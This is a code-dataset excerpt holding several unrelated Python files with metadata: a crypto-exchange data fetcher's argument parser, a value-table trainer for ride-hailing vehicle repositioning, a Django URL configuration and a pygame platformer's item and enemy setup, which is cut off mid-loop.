parser.add_argument(\"--api_key\",help=\"api key\", required=True)\n parser.add_argument(\"--api_secret\",help=\"api secret\", required=True)\n parser.add_argument(\"--pair\",help=\"pair slug\", required=True)\n parser_hist = subparser.add_parser(\"hist\",help=\"run hist\")\n parser_hist.add_argument(\"--start\",help=\"start yyyy-mm-dd\")\n parser_hist.set_defaults(func=parse_hist)\n parser_current = subparser.add_parser(\"current\", help=\"run current\")\n parser_current.set_defaults(func=parse_current)\n parser_startend = subparser.add_parser(\"startend\", help=\"run start end\")\n parser_startend.add_argument(\"--start\",help=\"start yyyy-mm-dd hh:mm:ss\")\n parser_startend.add_argument(\"--end\",help=\"start yyyy-mm-dd hh:mm:ss\")\n parser_startend.set_defaults(func=parse_startend)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__== \"__main__\":\n #todo(aj) arg for key and sec\n #todo(aj) arg for currency pairs\n main()\n", "sub_path": "exchangeapi/poloprocess_historical.py", "file_name": "poloprocess_historical.py", "file_ext": "py", "file_size_in_byte": 4686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.datetime.today", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 12, "usage_type": "call"}, {"api_name": "exchangeapi.interface.trade.Trade", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 57, "usage_type": "call"}, {"api_name": "poloniex.app.SyncApp", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 69, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "name"}, {"api_name": "poloniex.app.SyncApp", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 92, "usage_type": "name"}, {"api_name": "poloniex.app.SyncApp", "line_number": 104, "usage_type": "call"}, {"api_name": "exchangeapi.interface.model.db_session.query", "line_number": 108, "usage_type": "call"}, {"api_name": "exchangeapi.interface.model.db_session", "line_number": 108, "usage_type": "name"}, {"api_name": "sqlalchemy.func.max", "line_number": 108, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 108, "usage_type": "name"}, {"api_name": "exchangeapi.interface.model.TradeSocket.timestamp", "line_number": 108, "usage_type": "attribute"}, {"api_name": "exchangeapi.interface.model.TradeSocket", "line_number": 108, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 108, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "140506414", "text": "import torch\r\nimport numpy as np\r\nimport time\r\nimport os\r\nimport pandas as pd\r\nimport pickle\r\n\r\ndef read_file(*filenames):\r\n '''\r\n Load the data file and return a big numpy array that contains all information except order ID\r\n :param filenames: the tuple in which the name strings of the files are\r\n :return all_data_array: a numpy array\r\n '''\r\n if os.path.exists(\"all_data_array.npy\"):\r\n return np.load(\"all_data_array.npy\")\r\n all_data_array = np.zeros([0, 7])\r\n for filename in filenames:\r\n print('reading file:', filename)\r\n file = open(filename)\r\n data = file.readlines()\r\n data_list = []\r\n for line in data:\r\n tmp = line.split(',')\r\n for i in range(1, 8):\r\n tmp[i] = eval(tmp[i])\r\n data_list.append(tmp)\r\n file.close()\r\n data_array = np.zeros([len(data_list), 7])\r\n for i in range(len(data_list)):\r\n data_array[i, :] = np.array(data_list[i][1:8])\r\n all_data_array = np.concatenate([all_data_array, data_array])\r\n np.save(\"all_data_array.npy\", all_data_array)\r\n return all_data_array\r\n\r\ndef decode_state(state):\r\n '''\r\n Decode the input state to the network\r\n :param state: an n*3 numpy array, 3 columns are timestamp, longtitude, latitude respectively\r\n :return new_state: an n*4 numpy array, the first two columns are day_of_week and the number of 10-minute that have passed\r\n '''\r\n date = np.zeros([state.shape[0], 1])\r\n t = np.zeros([state.shape[0], 1])\r\n for i in range(state.shape[0]):\r\n tmp = time.gmtime(state[i, 0])\r\n date[i, 0] = tmp[6]\r\n t[i, 0] = tmp[3]*6+tmp[4]/10\r\n date = np.array(date)\r\n t = np.array(t)\r\n new_state = np.concatenate([date, t, state[:, 1:3]], axis=1)\r\n return new_state\r\n\r\n\r\n# The class used to discretize the map into square grids and storage the time table at the square grids\r\nclass loc_table(object):\r\n def __init__(self, load_file=None):\r\n self.grids = pd.read_csv('hexagon_grid_table.csv',\r\n names=['grid_id', 'lng1', 'lat1', 'lng2', 'lat2', 'lng3', 'lat3', 'lng4', 'lat4',\r\n 'lng5', 'lat5', 'lng6', 'lat6'])\r\n self.grids['lng'] = (self.grids['lng1'] + self.grids['lng2'] + self.grids['lng3'] + self.grids['lng4'] +\r\n self.grids['lng5'] + self.grids['lng6']) / 6\r\n self.grids['lat'] = (self.grids['lat1'] + self.grids['lat2'] + self.grids['lat3'] + self.grids['lat4'] +\r\n self.grids['lat5'] + self.grids['lat6']) / 6\r\n self.grids = self.grids.drop(4183)\r\n self.row_num, self.col_num = 100, 100\r\n self.date_num, self.time_num = 7, int(86400/(10*60))\r\n self.max_lng = 104.3\r\n self.min_lng = 103.7\r\n self.max_lat = 30.9\r\n self.min_lat = 30.4\r\n self.step_size_lng = (self.max_lng - self.min_lng) / self.col_num\r\n self.step_size_lat = (self.max_lat - self.min_lat) / self.row_num\r\n self.grid_table = pd.DataFrame(data=None, index=range(self.row_num), columns=range(self.col_num))\r\n self.table_table = [[None for i in range(self.col_num)] for j in range(self.row_num)] \r\n\r\n self.create_grid_table()\r\n self.create_table_table()\r\n\r\n if load_file is not None:\r\n self.load_table_table(load_file)\r\n\r\n def create_grid_table(self):\r\n '''\r\n Create a table that contains the grid IDs in square grids\r\n :return grid_table: a pd dataframe\r\n '''\r\n for k in range(self.grids.shape[0]):\r\n for l in range(1, 7):\r\n x, y = self.look_up(self.grids.iloc[k, 2 * l - 1], self.grids.iloc[k, 2 * l])\r\n if x is None:\r\n continue\r\n if type(self.grid_table.loc[x, y]) is float:\r\n self.grid_table.loc[x, y] = [self.grids.iloc[k, 0]]\r\n else:\r\n self.grid_table.loc[x, y].append(self.grids.iloc[k, 0])\r\n self.grid_table.to_csv('grid_table.csv', encoding='gbk')\r\n return self.grid_table\r\n\r\n def create_table_table(self):\r\n '''\r\n Create a table that contains the time table (from date&time to value) in square grids\r\n :return NN_table: a second order list\r\n '''\r\n for i in range(self.row_num):\r\n for j in range(self.col_num):\r\n self.table_table[i][j] = [[0.0 for i in range(self.time_num)] for j in range(self.date_num)]\r\n return self.table_table\r\n\r\n def look_up(self, lng, lat):\r\n '''\r\n Given the longitude and the latitude of a location, return the index of the location in the square grid table\r\n :param lng, lat: two float\r\n :return xlabel, ylabel: two int\r\n '''\r\n if lng <= self.min_lng or lng >= self.max_lng or lat <= self.min_lat or lat >= self.max_lat:\r\n return None, None\r\n xlabel = int((lng - self.min_lng) / self.step_size_lng)\r\n ylabel = int((lat - self.min_lat) / self.step_size_lat)\r\n if xlabel == self.col_num:\r\n xlabel -= 1\r\n if ylabel == self.row_num:\r\n ylabel -= 1\r\n return xlabel, ylabel\r\n\r\n def storage_table_table(self):\r\n f = open('table_table.pkl', 'wb')\r\n pickle.dump(self.table_table, f, -1)\r\n f.close()\r\n\r\n def load_table_table(self, filename):\r\n f = open(filename, 'rb')\r\n self.table_table = pickle.load(f)\r\n f.close()\r\n\r\n def look_up_value(self, lng, lat, timestamp):\r\n '''\r\n Return the values of the given state\r\n :param lng, lat, timestamp: three scalar\r\n :return value: an n-dim list\r\n '''\r\n state = np.array([[timestamp, lng, lat]])\r\n state = decode_state(state)\r\n date, t, lng, lat = state[0]\r\n x, y = self.look_up(lng, lat)\r\n if x is None:\r\n return 0\r\n value = self.table_table[int(x)][int(y)][int(date)][int(t)]\r\n\r\n return value\r\n\r\n\r\n\r\n# The training agent\r\nclass Agent(object):\r\n def __init__(\r\n self,\r\n gamma=0.9,\r\n batch_size=20000\r\n ):\r\n self.batch_size = batch_size\r\n self.gamma = gamma\r\n self.table = loc_table()\r\n self.criterion = torch.nn.MSELoss()\r\n\r\n def discount_reward(self, reward, dt):\r\n '''\r\n Modify the reward using the method from the paper\r\n :param reward: original reward\r\n :param dt: order duraction (second)\r\n :return modified_reward: reward after modified\r\n '''\r\n time_slot = 10*60 # 10 minutes\r\n num_slot = dt / time_slot # could be a float\r\n reward_per_slot = reward / num_slot\r\n modified_reward = reward_per_slot * (1 - self.gamma**num_slot) / (1 - self.gamma)\r\n\r\n return modified_reward\r\n\r\n def update_param(self, batch):\r\n '''\r\n Use a batch data to take one update of NN parameters\r\n :param batch: a numpy array with shape batch_size*7 (remove order ID)\r\n :return:\r\n '''\r\n this_state = decode_state(batch[:, [0, 2, 3]])\r\n next_state = decode_state(batch[:, [1, 4, 5]])\r\n dt = batch[:, 1] - batch[:, 0] # unit: second\r\n time_slot = 10 * 60 # 10 minutes\r\n num_slot = dt / time_slot\r\n reward = batch[:, 6]\r\n reward = self.discount_reward(reward, dt)\r\n for i in range(batch.shape[0]):\r\n this_x, this_y = self.table.look_up(this_state[i, 2], this_state[i, 3])\r\n next_x, next_y = self.table.look_up(next_state[i, 2], next_state[i, 3])\r\n this_date, this_time = int(this_state[i, 0]), int(this_state[i, 1])\r\n # print('this_date:', this_date, 'this_time:', this_time)\r\n next_date, next_time = int(next_state[i, 0]), int(next_state[i, 1])\r\n if this_x is None or next_x is None:\r\n continue\r\n predict_value = self.table.table_table[this_x][this_y][this_date][this_time]\r\n self.table.table_table[this_x][this_y][this_date][this_time] = reward[i] + self.gamma ** num_slot[i] * self.table.table_table[next_x][next_y][next_date][next_time]\r\n after_predict_value = self.table.table_table[this_x][this_y][this_date][this_time]\r\n MSE = self.criterion(torch.tensor(predict_value), torch.tensor(after_predict_value))\r\n print('MSE between updation:', MSE.item(), 'Value sample:', predict_value)\r\n # convergence_flag = (MSE < 1e-3)\r\n convergence_flag = False\r\n return convergence_flag\r\n\r\n def train(self, *filename):\r\n data_array = read_file(*filename)\r\n max_iteration = 15000\r\n for iter in range(max_iteration):\r\n print('iter:', iter)\r\n sample_index = np.random.choice(data_array.shape[0], self.batch_size, replace=False)\r\n batch = data_array[sample_index]\r\n convergence_flag = self.update_param(batch)\r\n if convergence_flag:\r\n break\r\n if iter % 300 == 0:\r\n self.table.storage_table_table()\r\n\r\n\r\nif __name__ == '__main__':\r\n Dummy_Agent = Agent()\r\n filepath = os.path.dirname(__file__) + '/data4/total_ride_request'\r\n file_list = os.listdir(filepath)\r\n file_list = file_list[1:]\r\n for i in range(len(file_list)):\r\n file_list[i] = filepath + '/' + file_list[i]\r\n Dummy_Agent.train(*file_list)\r\n", "sub_path": "model/reposition/train_pure_value_table.py", "file_name": "train_pure_value_table.py", "file_ext": "py", "file_size_in_byte": 9463, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.exists", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 126, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 162, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 213, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 225, "usage_type": "call"}]} +{"seq_id": "328801250", "text": "from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^$', 'plc.views.home', name='home'),\n url(r'^timer$', 'plc.views.timer', name='timer'),\n url(r'^clients/', include('clients.urls', namespace=\"clients\")),\n url(r'^employees/', include('employees.urls', namespace=\"employees\")),\n url(r'^matters/', include('matters.urls', namespace=\"matters\")),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n)\n", "sub_path": "plc/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 566, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 4, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 4, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "114693783", "text": "import pygame\r\nimport sys\r\nimport os\r\nfrom player import Player\r\nfrom enemy import Enemy\r\nfrom item import Item\r\nfrom portal import Portal\r\nfrom graphics import Graphics\r\nfrom pygame.locals import *\r\nimport collections\r\nfrom copy import copy\r\nimport random\r\nimport time\r\n\r\nclock = pygame.time.Clock()\r\n\r\npygame.init() # initiates pygame\r\nFPS = 60\r\n\r\npygame.display.set_caption('Pygame Platform')\r\n\r\nWINDOW_SIZE = (1200, 800)\r\nSCREEN_SIZE = (600, 400)\r\nscreen = pygame.display.set_mode(WINDOW_SIZE, 0, 32) # initiate the window\r\ndisplay = pygame.Surface(SCREEN_SIZE) # used as the surface for rendering, which is scaled\r\ngame_folder = os.path.dirname(__file__)\r\nimg_folder = os.path.join(game_folder, 'images')\r\ngraphics_folder = os.path.join(game_folder, 'Graphics')\r\nmusic_folder = os.path.join(game_folder, 'music')\r\n\r\nmap_level = 1\r\n# Gets the basic game music going (Commented Cause Im listening to music. Uncomment if forgotten)\r\n# pygame.mixer.init()\r\n# pygame.mixer.music.load(os.path.join(music_folder, 'GameMusic_1.mp3'))\r\n# pygame.mixer.music.play(-1, 0.0)\r\n\r\ngraphics = Graphics(graphics_folder, display, FPS)\r\n\r\ndirt_img = pygame.image.load(os.path.join(img_folder, 'dirt.png'))\r\ncastle_img = pygame.image.load(os.path.join(img_folder, 'castleCenter.png'))\r\nportal_img = pygame.image.load(os.path.join(img_folder, 'portal.jpg'))\r\nitem_img = pygame.image.load(os.path.join(img_folder, 'Chest.png')).convert_alpha()\r\nplayer_img = graphics.Player.get_model()\r\nspear_character_img = pygame.image.load(os.path.join(img_folder, 'MainCharacterSpear.png')).convert_alpha()\r\nenemy1_img = graphics.Enemy1.get_model()\r\nenemy2_img = graphics.Enemy2.get_model()\r\n\r\n\r\ndef split(word):\r\n return [char for char in word]\r\n\r\n\r\ndef enemy_values(enemy_type, difficulty): # enemy_type 1-2 & difficulty 1-3\r\n enemy_identifier = \"Enemy\" + str(enemy_type)\r\n enemy_image = enemy1_img if enemy_type == 1 else enemy2_img\r\n enemy_name = \"Enemy_\" + str(random.randint(0, 10000))\r\n enemy_max_health = 10 * difficulty\r\n enemy_defense = 1 * difficulty\r\n enemy_accuracy = difficulty / 2\r\n enemy_agility = -2 + difficulty\r\n enemy_attack = difficulty / 2\r\n enemy_speed = max(1, difficulty - 1)\r\n enemy_is_dead = False\r\n enemy_position = [0, 0]\r\n if enemy_type == 1:\r\n enemy_type = 2\r\n elif enemy_type == 2:\r\n enemy_type = 1\r\n else:\r\n enemy_type = enemy_type\r\n enemy_starting_weapon = enemy_weapon_creator(enemy_type, difficulty, map_level)\r\n enemy_starting_xp = 0\r\n enemy_death_xp = 40 * difficulty\r\n enemy_characteristics = [enemy_identifier, enemy_image, enemy_name, enemy_max_health, enemy_defense, enemy_accuracy,\r\n enemy_agility, enemy_attack, enemy_speed, enemy_is_dead, enemy_position,\r\n enemy_starting_weapon, enemy_starting_xp, enemy_death_xp]\r\n return enemy_characteristics\r\n\r\n\r\ndef enemy_weapon_creator(enemy_type, difficulty, level):\r\n enemy_weapon_name = \"Spear\"\r\n enemy_weapon_item_type = \"WEAPON\"\r\n enemy_weapon_damage = (enemy_type * difficulty * level) + 6\r\n enemy_weapon_defense = 0\r\n enemy_weapon_health = 0\r\n enemy_weapon_speed = 0\r\n enemy_weapon_length = 0\r\n enemy_weapon_hit_chance = min(80 + (2 * enemy_type * difficulty * level), 100)\r\n enemy_weapon_is_on_ground = False\r\n enemy_weapon_image = item_img\r\n enemy_weapon_player_image = spear_character_img\r\n enemy_weapon_position = [0, 0]\r\n if enemy_type == 1:\r\n enemy_weapon_magic = None\r\n elif enemy_type == 2:\r\n if difficulty == 1:\r\n enemy_weapon_magic = [\"DAMAGE\", 1]\r\n elif difficulty == 2:\r\n enemy_weapon_magic = [\"DAMAGE\", 2]\r\n elif difficulty == 3:\r\n enemy_weapon_magic = [\"DAMAGE\", 3]\r\n else:\r\n enemy_weapon_magic = [\"DAMAGE\", difficulty * enemy_type]\r\n else:\r\n enemy_weapon_magic = None\r\n enemy_item = Item(enemy_weapon_name, enemy_weapon_item_type, enemy_weapon_damage, enemy_weapon_defense,\r\n enemy_weapon_health, enemy_weapon_speed, enemy_weapon_length, enemy_weapon_hit_chance,\r\n enemy_weapon_is_on_ground, enemy_weapon_image, enemy_weapon_player_image, enemy_weapon_position,\r\n enemy_weapon_magic)\r\n return enemy_item\r\n\r\n\r\ndef map_item_creator(level):\r\n map_1_drop = [19, 38, 57, 76, 95, 96, 97, 100]\r\n # map_2_drop = [12, 12, 12, 12, 12, 14, 14, 12]\r\n map_2_drop = [12, 24, 36, 48, 60, 74, 88, 100]\r\n # map_3_drop = [10, 10, 10, 10, 10, 20, 20, 10]\r\n map_3_drop = [10, 20, 30, 40, 50, 70, 90, 100]\r\n if level == 1:\r\n map_drop = map_1_drop\r\n elif level == 2:\r\n map_drop = map_2_drop\r\n elif level == 3:\r\n map_drop = map_3_drop\r\n else:\r\n map_drop = map_1_drop\r\n\r\n rand_int1 = random.randint(1, 100)\r\n rand_int2 = random.randint(1, 100)\r\n rand_int3 = random.randint(1, 2)\r\n rand_int = rand_int1 if rand_int3 == 1 else rand_int2\r\n if rand_int <= map_drop[0]: # Spear -------------------------------------------------------------------------------\r\n item_name = \"Spear\"\r\n item_item_type = \"WEAPON\"\r\n item_damage = 8*level\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = min(100, 90+(2*level))\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = spear_character_img\r\n item_magic = [\"DAMAGE\", level*5]\r\n\r\n elif map_drop[0] < rand_int <= map_drop[1]: # Shield---------------------------------------------------------------\r\n item_name = \"Shield\"\r\n item_item_type = \"SHIELD\"\r\n item_damage = 0\r\n item_defense = 2*level\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = [\"DEFENSE\", level * 2]\r\n\r\n elif map_drop[1] < rand_int <= map_drop[2]: # Helmet---------------------------------------------------------------\r\n item_name = \"Helmet\"\r\n item_item_type = \"HELMET\"\r\n item_damage = 0\r\n item_defense = level\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = None\r\n\r\n elif map_drop[2] < rand_int <= map_drop[3]: # Armor----------------------------------------------------------------\r\n item_name = \"Armor\"\r\n item_item_type = \"ARMOR\"\r\n item_damage = 0\r\n item_defense = 3*level\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = None\r\n\r\n elif map_drop[3] < rand_int <= map_drop[4]: # Boots----------------------------------------------------------------\r\n item_name = \"Boots\"\r\n item_item_type = \"BOOTS\"\r\n item_damage = 0\r\n item_defense = level\r\n item_health = 0\r\n item_speed = level\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = None\r\n\r\n elif map_drop[4] < rand_int <= map_drop[5]: # Potions--------------------------------------------------------------\r\n rand_choice = random.randint(1, 4)\r\n item_name = \"Potion\"\r\n\r\n if rand_choice == 1: # Damage potion\r\n item_item_type = \"DAMAGE_POTION\"\r\n item_damage = 5*level\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = 0\r\n\r\n elif rand_choice == 2: # Defense potion\r\n item_item_type = \"DEFENSE_POTION\"\r\n item_damage = 0\r\n item_defense = 5*level\r\n item_health = 0\r\n item_speed = 0\r\n\r\n elif rand_choice == 3: # Healing potion\r\n item_item_type = \"HEALING_POTION\"\r\n item_damage = 0\r\n item_defense = 0\r\n item_health = 5*level\r\n item_speed = 0\r\n\r\n else: # Speed potion\r\n item_item_type = \"SPEED_POTION\"\r\n item_damage = 0\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = level\r\n\r\n item_length = 10 * level\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = None\r\n\r\n elif map_drop[5] < rand_int <= map_drop[6]: # Trinkets-------------------------------------------------------------\r\n item_name = \"Trinket\"\r\n item_item_type = \"TRINKET\"\r\n item_damage = 0\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = [\"DAMAGE\", int(2 * level)]\r\n\r\n elif map_drop[6] < rand_int <= map_drop[7]: # Necklace-------------------------------------------------------------\r\n item_name = \"Necklace\"\r\n item_item_type = \"NECKLACE\"\r\n item_damage = 0\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = [\"HEALTH\", 2*level]\r\n\r\n else:\r\n item_name = \"Necklace\"\r\n item_item_type = \"NECKLACE\"\r\n item_damage = 0\r\n item_defense = 0\r\n item_health = 0\r\n item_speed = 0\r\n item_length = 0\r\n item_hit_chance = 0\r\n item_is_on_ground = True\r\n item_image = item_img\r\n item_player_image = None\r\n item_magic = [\"HEALTH\", 2 * level]\r\n print(\"Problem with drop chances\")\r\n\r\n item_position = [0, 0]\r\n item_to_return = Item(item_name, item_item_type, item_damage, item_defense, item_health, item_speed, item_length,\r\n item_hit_chance, item_is_on_ground, item_image, item_player_image, item_position, item_magic)\r\n return item_to_return\r\n\r\n\r\ndef load_new_map(path, level):\r\n f = open(path + str(level) + '.txt', 'r')\r\n data = f.read()\r\n f.close()\r\n\r\n data = data.split('\\n')\r\n\r\n items_set = []\r\n portal_set = []\r\n enemies_set_1 = []\r\n enemies_set_2 = []\r\n\r\n c = 0\r\n item_count = 0\r\n enemy1_count = 0\r\n enemy2_count = 0\r\n portal_count = 0\r\n\r\n f = open(path + '_' + str(level) + '.txt', 'w')\r\n f.seek(0, 0)\r\n for row in data:\r\n r = 0\r\n for k in row:\r\n if str(k) == str(2):\r\n new_item = map_item_creator(map_level)\r\n new_item.set_position([r, c])\r\n items_set.append(new_item)\r\n block = split(row)\r\n block[r] = \"0\"\r\n row = block\r\n row = ''.join(row)\r\n item_count += 1\r\n\r\n if str(k) == \"*\":\r\n portal_new_name = \"Portal \" + str(map_level)\r\n new_portal = Portal(portal_new_name, [r, c], portal_img)\r\n portal_set.append(new_portal)\r\n row = ''.join(row)\r\n portal_count += 1\r\n\r\n if str(k) == str(3):\r\n values = enemy_values(2, 1)\r\n enemy2 = Enemy(values[0], values[1], values[2], values[3], values[4], values[5], values[6], values[7],\r\n values[8], values[9], values[10], values[11], values[12], values[13])\r\n enemy2.set_position([r, c])\r\n enemies_set_2.append(enemy2)\r\n block = split(row)\r\n block[r] = \"0\"\r\n row = block\r\n row = ''.join(row)\r\n enemy2_count += 1\r\n\r\n if str(k) == str(4):\r\n values = enemy_values(1, 2)\r\n enemy1 = Enemy(values[0], values[1], values[2], values[3], values[4], values[5], values[6], values[7],\r\n values[8], values[9], values[10], values[11], values[12], values[13])\r\n enemy1.set_position([r, c])\r\n enemies_set_1.append(enemy1)\r\n block = split(row)\r\n block[r] = \"0\"\r\n row = block\r\n row = ''.join(row)\r\n enemy1_count += 1\r\n\r\n else:\r\n pass\r\n r += 1\r\n f.write(str(row) + '\\n')\r\n c += 1\r\n f.close()\r\n return items_set, portal_set, enemies_set_1, enemies_set_2\r\n\r\n# name, item_type, damage, defense, health, speed, length, hit_chance, is_on_ground, image, player_image, position,\r\n# magic):\r\n\r\n\r\n# items = []\r\n# item2 = Item(\"Spear\", \"WEAPON\", 1, 0, 0, 0, 0, 90, True, item_img, spear_character_img, [0, 0], None) # [10, 6]\r\n# item3 = Item(\"Spear\", \"WEAPON\", 1, 0, 0, 0, 0, 90, True, item_img, spear_character_img, [0, 0], None)\r\n# item4 = Item(\"Spear\", \"WEAPON\", 1, 0, 0, 0, 0, 90, True, item_img, spear_character_img, [0, 0], None)\r\n# item5 = Item(\"Spear\", \"WEAPON\", 1, 0, 0, 0, 0, 90, True, item_img, spear_character_img, [0, 0], None)\r\n# item3 = Item(\"Leather Armor\", \"ARMOR\", 0, 5, 0, 0, 0, True, item_img, None, [0, 0], None) # [20, 3]\"Boots\", \"BOOTS\",\r\n# 0, 1, 0, True, item_img, None, [0, 0], None\r\n# item3 = Item(\"Attack Necklace\", \"NECKLACE\", 0, 0, 0, 0, 0, 0, True, item_img, None, [0, 0], [\"DAMAGE\", 2])\r\n# item3 = Item(\"Hth_Potion\", \"HEALING_POTION\", 0, 0, 0, 0, 10, 0, True, item_img, None, [0, 0], [\"HEALTH\", 5])\r\n# item3 = Item(\"Spd_Potion\", \"SPEED_POTION\", 0, 0, 0, 0, 20, 0, True, item_img, None, [0, 0], [\"SPEED\", 1])\r\n# item4 = Item(\"Shield\", \"SHIELD\", 0, 3, 0, 0, 0, 0, True, item_img, None, [0, 0], None) # [15, 6]\r\n# item5 = Item(\"Boots\", \"BOOTS\", 0, 1, 0, 0, 0, 0, True, item_img, None, [0, 0], None) # [20, 6]\r\n# item6 = Item(\"Helmet\", \"HELMET\", 0, 1, 0, 0, 0, 0, True, item_img, None, [0, 0], None) # [15, 6]\r\n# item7 = Item(\"Boots\", \"BOOTS\", 0, 2, 0, 0, 0, 0, True, item_img, None, [0, 0], None) # [20, 6]\r\n\r\n# item1 = Item(\"Spear\", \"WEAPON\", 5, 0, 0, 0, 0, 90, False, item_img, spear_character_img, [0, 0], [\"DAMAGE\", 0])\r\n\r\n#\r\n# items.append(item2)\r\n# items.append(item3)\r\n# items.append(item4)\r\n# items.append(item5)\r\n# items.append(item6)\r\n# items.append(item7)\r\n\r\nplayers = []\r\nplayer1 = Player(\"Player\", player_img, \"Andrew\", 12, 0, -1, 0, -1, 1, False, [6, 6], None, 201, 20)\r\nplayer2 = Player(\"Player\", player_img, \"Yeet\", 100, 0, 1, 0, 1, 2, False, [1, 3], None, 201, 20)\r\nplayers.append(player2)\r\n\r\nitems, portals, enemies1, enemies2 = load_new_map('map', map_level)\r\nobjects = [player2]\r\ncharacters = [player2]\r\n\r\nenemies = []\r\nfor i in items:\r\n objects.append(i)\r\nfor i in portals:\r\n objects.append(i)\r\nfor i in enemies1:\r\n objects.append(i)\r\n characters.append(i)\r\n enemies.append(i)\r\nfor i in enemies2:\r\n objects.append(i)\r\n characters.append(i)\r\n 